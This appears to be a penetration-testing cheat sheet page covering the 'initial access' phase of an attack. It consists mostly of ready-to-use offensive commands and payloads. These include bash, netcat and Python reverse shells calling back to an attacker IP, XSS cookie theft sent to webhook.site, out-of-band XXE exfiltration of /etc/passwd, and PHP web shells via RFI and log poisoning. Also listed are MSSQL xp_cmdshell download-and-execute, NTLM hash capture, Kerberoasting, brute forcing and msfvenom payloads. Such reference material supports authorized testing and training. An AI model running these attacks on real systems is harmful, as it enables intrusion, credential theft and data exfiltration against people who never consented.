Methodology — Phase 2

Initial Access

Web exploitation, credential attacks, payload delivery, and service abuse. Getting that first shell is everything.

SQLmap Hydra WPScan msfvenom CrackMapExec Burp Suite git-dumper
Back to Home
Recon & Enum Initial Access Post-Exploitation
Table of Contents

Attack Surface Map

01
Web Recon

Source code, robots.txt, headers, CMS fingerprinting.

02
Exploit

SQLi, LFI, RFI, XSS, XXE, Kerberoasting, MSSQL.

03
Delivery

msfvenom payloads, web shells, SMB/FTP drops.

04
Shell

Catch reverse shell, upgrade TTY, stabilise.

1. Web Reconnaissance

Source Code & Fingerprinting
# Source code — grep for secrets
curl -s https://target.com | grep -iE "comment|TODO|password|api_key|secret"

# robots.txt and sitemap
curl https://target.com/robots.txt
curl https://target.com/sitemap.xml

# Fingerprint server stack
whatweb -v -a 3 https://target.com
curl -I https://target.com | grep -iE "Server:|X-Powered-By:|Set-Cookie:|X-Generator:"

# Nikto — automated scanner
nikto -h https://target.com -o nikto_out.txt -Format txt

# Extract hidden API endpoints from JS files
curl https://target.com/app.js | grep -oE '"(/[a-zA-Z0-9/_-]+)"' | sort -u
HeaderReveals
Server: Apache/2.4.41OS + server version
X-Powered-By: PHP/7.4.3Language stack
Set-Cookie: PHPSESSIDPHP backend
Set-Cookie: JSESSIONIDJava backend
X-Generator: WordPress 5.8CMS + version

2. CMS Detection & Exploitation

WordPress — WPScan
# Enumerate users, vulnerable plugins/themes
wpscan --url https://target.com --enumerate u,vp,vt,dbe \
  --api-token YOUR_TOKEN -o wpscan.txt

# Brute force discovered users
wpscan --url https://target.com --usernames admin,editor \
  -P /usr/share/wordlists/rockyou.txt --password-attack wp-login

# Hydra — brute force wp-login.php
hydra -l admin -P rockyou.txt target.com \
  http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:ERROR"

# Searchsploit — offline exploit-db search
searchsploit wordpress 5.8
searchsploit "plugin-name 2.3.1"
searchsploit -m php/webapps/12345.py
Other CMS Tools
# Drupal
droopescan scan drupal -u https://target.com

# Joomla
joomscan -u https://target.com

# Multi-CMS scanner
cmsmap https://target.com

3. Parameter Testing & Web Exploits

SQL Injection
# SQLmap — GET parameter
sqlmap -u "https://target.com/page?id=1" --dbs --batch --level 3 --risk 2

# SQLmap — POST via Burp request file
sqlmap -r request.txt --dbs --batch --dbms=mysql

# Dump specific table
sqlmap -r request.txt -D target_db -T users --dump

# OS shell (if DB user has FILE privilege)
sqlmap -r request.txt --os-shell
Manual payloads: ' OR 1=1--  |  ' OR '1'='1  |  1; SELECT sleep(5)--  |  1' AND 1=2 UNION SELECT null,null,null--
Command Injection
# Test payloads in parameters
; id
| id
` id `
$(id)
%0a id

# Reverse shells
bash -i >& /dev/tcp/10.10.14.5/4444 0>&1
nc -e /bin/bash 10.10.14.5 4444
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("10.10.14.5",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'

# Catch
nc -lvnp 4444
LFI — Local File Inclusion
# Basic traversal
?page=../../../../etc/passwd
?page=....//....//....//etc/passwd
?page=%2F%2F%2F%2F%2Fetc%2Fpasswd

# PHP filter — base64 encode file contents
?page=php://filter/convert.base64-encode/resource=/etc/passwd
echo "BASE64STRING" | base64 -d

# SSH keys
?page=../../../../root/.ssh/id_rsa
?page=../../../../home/user/.ssh/id_rsa

# Log poisoning (Apache) — inject PHP into User-Agent then include log
curl -A "<?php system(\$_GET['cmd']); ?>" https://target.com
?page=../../../../var/log/apache2/access.log&cmd=id
RFI — Remote File Inclusion
# Host malicious PHP
echo '<?php system($_GET["cmd"]); ?>' > shell.php
python3 -m http.server 80

# Include via parameter
?page=http://10.10.14.5/shell.php&cmd=id

# Upgrade to reverse shell
?page=http://10.10.14.5/shell.php&cmd=bash+-i+>%26+/dev/tcp/10.10.14.5/4444+0>%261

nc -lvnp 4444
XSS — Cross-Site Scripting
// Basic reflection test
<script>alert(1)</script>
<img src=x onerror=alert(1)>
"><script>alert(1)</script>

// Cookie theft
<script>fetch('https://webhook.site/UUID?c='+document.cookie)</script>
<script>new Image().src='http://10.10.14.5/?c='+document.cookie</script>

// Catch stolen cookie
nc -lvnp 80
XXE — XML External Entity
<!-- Basic XXE — read /etc/passwd -->
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root><data>&xxe;</data></root>

<!-- OOB XXE (blind) — host evil.dtd -->
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY % xxe SYSTEM "http://10.10.14.5/evil.dtd">%xxe;]>
<root/>
evil.dtd contents:
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://10.10.14.5/?d=%file;'>">
%eval;
%exfil;

4. Kerberoasting — Port 88

What it is: Any authenticated domain user can request a TGS ticket for any service account with an SPN. The ticket is encrypted with the service account's NTLM hash and can be cracked offline.
Enumerate SPNs
# List all SPNs in domain with impacket
GetUserSPNs.py DOMAIN/user:password -dc-ip DC_IP

# Get service accounts with SPNs and their descriptions
GetUserSPNs.py DOMAIN/user:password -dc-ip DC_IP -request-user svcMSSQL

# Enumerate SPNs via PowerShell (on Windows target)
setspn -T DOMAIN -Q */*
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName

# With BloodHound collection
.\SharpHound.exe -c All --zipfilename loot.zip
Request TGS Tickets & Crack
# Request ALL kerberoastable TGS tickets at once
GetUserSPNs.py DOMAIN/user:password -dc-ip DC_IP -request \
  -outputfile kerberoast_hashes.txt

# Request for specific service account
GetUserSPNs.py DOMAIN/user:password -dc-ip DC_IP \
  -request-user svcMSSQL -outputfile svc_hash.txt

# From Windows with Rubeus
.\Rubeus.exe kerberoast /outfile:hashes.txt
.\Rubeus.exe kerberoast /user:svcMSSQL /outfile:svc_hash.txt

# Via Metasploit
use auxiliary/gather/get_user_spns
set RHOSTS DC_IP
set SMBUser user
set SMBPass password
run

# Crack — hashcat mode 13100 (RC4-HMAC)
hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt
hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt \
  --rules-file /usr/share/hashcat/rules/best64.rule

# Crack with john
john --wordlist=/usr/share/wordlists/rockyou.txt kerberoast_hashes.txt
john --show kerberoast_hashes.txt
Hash ModeEncryptionHashcat Flag
RC4-HMACType 23-m 13100
AES-128etype 17-m 19600
AES-256etype 18-m 19700
Post-Crack — Use Credentials
# Once cracked — authenticate as service account
evil-winrm -i TARGET_IP -u svcMSSQL -p CrackedPass123

# Check what the service account can access
crackmapexec smb DC_IP -u svcMSSQL -p CrackedPass123 --shares
crackmapexec smb DC_IP -u svcMSSQL -p CrackedPass123 --sam

# Pass-the-hash if you have NTLM
crackmapexec smb TARGET_IP -u svcMSSQL -H NTLM_HASH --exec-method wmiexec -x whoami

5. AS-REP Roasting — Port 88

What it is: Accounts with Do not require Kerberos preauthentication set allow anyone to request an AS-REP containing a hash encrypted with their password — no credentials needed.
Enumerate Vulnerable Accounts
# With credentials — enumerate accounts without preauth
GetNPUsers.py DOMAIN/ -dc-ip DC_IP -usersfile users.txt -no-pass -format hashcat

# No credentials needed — but need username list
GetNPUsers.py DOMAIN/ -dc-ip DC_IP -no-pass -usersfile users.txt

# Build username list from RPC/SMB
crackmapexec smb DC_IP -u '' -p '' --rid-brute > rid_output.txt
grep "SidTypeUser" rid_output.txt | awk '{print $6}' | cut -d'\' -f2 > users.txt

# BloodHound — find accounts with DONT_REQ_PREAUTH
MATCH (u:User {dontreqpreauth: true}) RETURN u.name

# PowerView on target
Get-DomainUser -PreauthNotRequired | select samaccountname
Request AS-REP Hashes & Crack
# Request AS-REP for all vulnerable users (no auth needed)
GetNPUsers.py DOMAIN/ -dc-ip DC_IP -no-pass -usersfile users.txt \
  -format hashcat -outputfile asrep_hashes.txt

# Request for specific user
GetNPUsers.py DOMAIN/svc-alfresco -dc-ip DC_IP -no-pass \
  -format hashcat -outputfile svc_asrep.txt

# From Windows — Rubeus
.\Rubeus.exe asreproast /format:hashcat /outfile:asrep.txt
.\Rubeus.exe asreproast /user:svc-alfresco /format:hashcat /outfile:asrep.txt

# Crack — hashcat mode 18200 (Kerberos AS-REP etype 23)
hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt
hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt \
  --rules-file /usr/share/hashcat/rules/best64.rule

# John
john --wordlist=/usr/share/wordlists/rockyou.txt asrep_hashes.txt
AttackRequires AuthHash ModeTarget
KerberoastingYes (any domain user)-m 13100Service accounts with SPN
AS-REP RoastingNo-m 18200Users without preauth

6. MSSQL Command Execution

Default Port: TCP 1433  |  Key Feature: xp_cmdshell allows OS command execution directly from SQL queries when enabled (or re-enabled by a sysadmin).
Enumerate & Connect
# Nmap — detect MSSQL and version
nmap -p 1433 -sV -sC --script ms-sql-info,ms-sql-config,ms-sql-empty-password 10.10.10.1

# Impacket — connect with credentials
mssqlclient.py DOMAIN/user:password@TARGET_IP -windows-auth
mssqlclient.py sa:password@TARGET_IP

# Metasploit — auxiliary scanner
use auxiliary/scanner/mssql/mssql_login
set RHOSTS TARGET_IP
set USER_FILE users.txt
set PASS_FILE passwords.txt
run

# CrackMapExec
crackmapexec mssql TARGET_IP -u user -p password
crackmapexec mssql TARGET_IP -u user -p password -q "SELECT @@version"

# Enumerate databases
SELECT name FROM sys.databases;
SELECT * FROM sys.tables;

# Check current user and roles
SELECT SYSTEM_USER;
SELECT IS_SRVROLEMEMBER('sysadmin');
SELECT IS_MEMBER('db_owner');
Enable & Use xp_cmdshell
-- Check if xp_cmdshell is enabled
EXEC sp_configure 'xp_cmdshell';

-- Enable xp_cmdshell (requires sysadmin)
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;

-- Execute OS commands
EXEC xp_cmdshell 'whoami';
EXEC xp_cmdshell 'ipconfig';
EXEC xp_cmdshell 'net user';
EXEC xp_cmdshell 'dir C:\';

-- PowerShell reverse shell via xp_cmdshell
EXEC xp_cmdshell 'powershell -enc BASE64_ENCODED_REVERSE_SHELL';

-- Download and execute payload
EXEC xp_cmdshell 'certutil -urlcache -split -f http://10.10.14.5/shell.exe C:\Temp\shell.exe';
EXEC xp_cmdshell 'C:\Temp\shell.exe';
Linked Servers & Lateral Movement
-- Enumerate linked servers
SELECT * FROM sys.servers;
EXEC sp_linkedservers;

-- Query linked server
SELECT * FROM OPENQUERY([LINKED_SERVER], 'SELECT @@version');

-- Execute xp_cmdshell on linked server
EXECUTE('EXEC xp_cmdshell ''whoami''') AT [LINKED_SERVER];

-- Double-hop through linked servers
EXECUTE('EXECUTE(''EXEC xp_cmdshell ''''whoami'''''' ) AT [SERVER_B]') AT [SERVER_A];

-- Impersonate another login (if IMPERSONATE granted)
EXECUTE AS LOGIN = 'sa';
SELECT SYSTEM_USER;
EXEC xp_cmdshell 'whoami';
File Read / Write via MSSQL
-- Read a file (BULK INSERT)
CREATE TABLE temp_file (content VARCHAR(MAX));
BULK INSERT temp_file FROM 'C:\Windows\System32\drivers\etc\hosts'
  WITH (FIELDTERMINATOR = '\n', ROWTERMINATOR = '\n');
SELECT * FROM temp_file;
DROP TABLE temp_file;

-- Write file using xp_cmdshell
EXEC xp_cmdshell 'echo test > C:\Temp\test.txt';

-- Write web shell (if web root is known)
EXEC xp_cmdshell 'echo <?php system($_GET["cmd"]); ?> > C:\inetpub\wwwroot\shell.php';

-- UNC path capture (NTLM hash theft with Responder running)
EXEC xp_dirtree '\\10.10.14.5\share';
NTLM Capture: Start responder -I tun0 -wrf then trigger xp_dirtree to capture service account Net-NTLMv2 hash for offline cracking.

7. Exposed Files & Git Dumping

Sensitive File Probing
curl -s https://target.com/.env
curl -s https://target.com/.git/HEAD
curl -s https://target.com/config.php.bak
curl -s https://target.com/wp-config.php~
curl -s https://target.com/database.sql
curl -s https://target.com/backup.zip
curl -s https://target.com/web.config

gobuster dir -u https://target.com \
  -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt \
  -x bak,env,sql,zip,tar.gz,old,swp
Extract from .env / .bak: DB_PASSWORD, APP_KEY, SECRET_KEY, API_KEY, AWS_SECRET_ACCESS_KEY
Git Repository Dumping
# Dump exposed .git directory
git-dumper https://target.com/.git/ ./dumped_git
cd dumped_git

# View commit history
git log --oneline

# Show full diff of specific commit
git show <commit_hash>

# Search ALL commit diffs for secrets
git log -p | grep -iE "password|secret|api_key|token|credential|passwd"

# List files ever committed (including deleted)
git log --all --full-history -- "*.env"
git show HEAD~1:config.php

# Automated secret scanning
trufflehog git file://./dumped_git --only-verified

8. Service Enumeration & Brute Force

SSH
hydra -l admin -P rockyou.txt ssh://target.com -t 4
hydra -L users.txt -P passwords.txt ssh://target.com -t 4 -V

# Private key login
chmod 600 id_rsa
ssh -i id_rsa user@target.com
FTP
ftp target.com
# Username: anonymous / Password: blank

# Download everything
ftp> prompt off
ftp> recurse on
ftp> mget *

wget -r ftp://anonymous:anonymous@target.com/
hydra -l admin -P rockyou.txt ftp://target.com
SMB
crackmapexec smb target.com -u '' -p ''
crackmapexec smb target.com -u '' -p '' --rid-brute
crackmapexec smb target.com -u users.txt -p passwords.txt --continue-on-success
crackmapexec smb target.com -u admin -p Pass123 --shares

smbclient -N -L //target.com
smbclient //target.com/share -U admin%Pass123
smb> prompt off
smb> recurse on
smb> mget *
RDP
hydra -l administrator -P rockyou.txt rdp://target.com

xfreerdp /u:administrator /p:Password123 /v:target.com
rdesktop target.com

9. Payload Generation & Delivery

Msfvenom Payloads
# Windows x64 stageless EXE Windows
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f exe -o shell.exe

# Linux x64 stageless ELF Linux
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f elf -o shell.elf
chmod +x shell.elf

# PHP reverse shell Web
msfvenom -p php/reverse_php LHOST=10.10.14.5 LPORT=4444 -f raw -o shell.php

# ASP reverse shell (IIS) Windows
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f asp -o shell.asp

# WAR file (Tomcat / JBoss) Web
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f war -o shell.war
Catching & Upgrading Shells
# Netcat listener
nc -lvnp 4444

# MSF multi/handler (staged payloads)
msfconsole -q
use exploit/multi/handler
set payload windows/x64/shell_reverse_tcp
set LHOST 10.10.14.5
set LPORT 4444
exploit -j

# Upgrade basic shell to fully interactive TTY
python3 -c 'import pty;pty.spawn("/bin/bash")'
# Ctrl+Z
stty raw -echo; fg
export TERM=xterm
GPP Password (Active Directory)
# Find cpassword in SYSVOL
find /mnt/sysvol -name "Groups.xml" 2>/dev/null
find /mnt/sysvol -name "*.xml" | xargs grep -l "cpassword"

# Decrypt
gpp-decrypt "AzVJmXh4VwDGP7BQkPMr+2KZS6Hm9qKZrHKJGQVkF..."

# CrackMapExec automated
crackmapexec smb target.com -u '' -p '' -M gpp_password

Quick Reference

VulnerabilityToolKey Flag / Pattern
SQLi GETsqlmap-u "url?id=1" --dbs
SQLi POSTsqlmap-r request.txt --dbs
KerberoastingGetUserSPNs.py-request -outputfile hashes.txt
AS-REP RoastingGetNPUsers.py-no-pass -usersfile users.txt
MSSQL RCEmssqlclient.pyEXEC xp_cmdshell 'whoami'
WordPresswpscan--enumerate u,vp,vt
SSH bruteforcehydra-l user -P list ssh://target
SMB userscrackmapexec--rid-brute
Git dumpgit-dumperhttps://target.com/.git/ ./out
GPP decryptgpp-decrypt"<cpassword value>"
Rev shell catchnc-lvnp 4444
LFI passwdcurl/browser?page=../../../../etc/passwd
Hash crack (Kerberoast)hashcat-m 13100 hashes.txt rockyou.txt
Hash crack (AS-REP)hashcat-m 18200 hashes.txt rockyou.txt
Recon & Enum Post-Exploitation